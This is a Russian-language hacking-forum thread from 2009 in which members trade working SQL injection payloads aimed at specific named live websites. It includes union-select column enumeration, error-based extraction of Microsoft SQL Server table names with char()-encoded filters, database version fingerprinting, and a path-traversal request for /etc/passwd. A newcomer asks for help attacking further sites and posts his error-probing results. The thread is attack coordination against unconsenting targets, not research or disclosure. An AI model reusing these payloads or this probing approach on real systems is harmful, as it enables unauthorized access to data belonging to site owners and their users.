29.01.2009, 21:30
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от TELO
http://runnercat.org.ua/page.php?id=13172%20order%20by%201%20--
а что дальше?
А дальше http://runnercat.org.ua/page.php?id=-13172+union+select+1+--
и "you are bannded Dear mr Cracker" =)))
|
|
|
29.01.2009, 18:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://runnercat.org.ua/page.php?id=13172+and+substring(version(),1,1)=5
|
|
|
|
29.01.2009, 19:19
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
http://milw0rm.com/search.php wordpress
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
29.01.2009, 21:54
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
Ребят помогите развести вот такую тему че то дальше не смог никуда пойти.
http://www.asipartner.com/pr.asp?ID=78+or+1=@@version--
'Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86) Feb 26 2008 18:15:01 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
|
|
|
|
29.01.2009, 22:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
http://www.asipartner.com/pr.asp?ID=78+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
ExpireNewSKU
http://www.asipartner.com/pr.asp?ID=781+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( char(69)%2Bchar(120)%2Bchar(112)%2Bchar(105)%2Bcha r(114)%2Bchar(101)%2Bchar(78)%2Bchar(101)%2Bchar(1 19)%2Bchar(83)%2Bchar(75)%2Bchar(85)))--
QUESTIONS
http://www.asipartner.com/pr.asp?ID=781+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( char(69)%2Bchar(120)%2Bchar(112)%2Bchar(105)%2Bcha r(114)%2Bchar(101)%2Bchar(78)%2Bchar(101)%2Bchar(1 19)%2Bchar(83)%2Bchar(75)%2Bchar(85),char(81)%2Bch ar(85)%2Bchar(69)%2Bchar(83)%2Bchar(84)%2Bchar(73) %2Bchar(79)%2Bchar(78)%2Bchar(83)))--
ANSWERS
и т.д. https://forum.antichat.ru/thread30501.html
|
|
|
|
29.01.2009, 23:45
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 4
С нами:
9104376
Репутация:
-1
|
|
здраствуйте
отправили меня в этот топик 
вот сдаюсь
помогите пожалуйста
http://www.pitchsidemanager.com/club.php?stid=-1294'
http://www.pitchsidemanager.com/profile.php?smid=-1'
http://www.pitchsidemanager.com/player_profile.php?pid=-3406' |
|
|
|
30.01.2009, 00:54
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от x311
здраствуйте
отправили меня в этот топик
вот сдаюсь
помогите пожалуйста
http://www.pitchsidemanager.com/club.php?stid=-1294'
http://www.pitchsidemanager.com/profile.php?smid=-1'
http://www.pitchsidemanager.com/player_profile.php?pid=-3406' Вот:
Код:
http://www.pitchsidemanager.com/club.php?stid=-1294'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+
|
|
|
|
29.01.2009, 23:49
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
С нами:
9230096
Репутация:
464
|
|
а где тут скуль???
|
|
|
|
30.01.2009, 00:17
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Наверно нужно быть зарегенным что-бы увидеть...
http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00
|
|
|
|
30.01.2009, 03:16
|
|
Новичок
Регистрация: 23.01.2009
Сообщений: 4
С нами:
9104376
Репутация:
-1
|
|
Сообщение от ElteRUS
Наверно нужно быть зарегенным что-бы увидеть...
http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00
улыбнуло
Спасибо всем ! значит просто я поля не так подбирал ...
вот еще одна незадача.
motion-twin.com/blog/month?m=10001'
1. Когда подставляю -10001' ошибка не выползает , но что бы выползла - не получается
2. Если выполнить такой запрос -1'/* ошибка показывается вот с такой фишкой , где меняется дата
SELECT BlogEntry.* FROM BlogEntry LEFT JOIN BlogCategory ON BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '-1'/-*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC' at line 1
3 . Если убрать минус то получится 1'/* то выдает date.c(104) : Invalid date format : 1-00-01
4 .Попбробовал -1-00-01'/* Календарь показал :
Zero -1
Lu Ma Me Je Ve Sa Di
1 2 3 4
5. (если -10 то ивалид date , если -100,-200 etc то на календаре меняется Zero -100, -200)
6 . Все что ниже 10000 = ошибка
7. А вот когда делаю запрос m=999999'+order+by+1/*
на календаре теперь
null 9999
Lu Ma Me Je Ve Sa Di
1 2 3 4
(на заметку : отображаются только числа 1,2.3.4 на каледнаре из 31)
8 . Пробовал 25-02-05' или 25-02-05 для примера показывает February 25
9. когда -25-02-05 выдает date.c(104) : Invalid date format : -25-02-01
10 . когда 1'+order+by+1/* выдает ошибку где вместо 0000 видно такое
BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= ' 1' o-rd-01' AND cdate <= '1' o-rd-31' ORDER BY
=
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
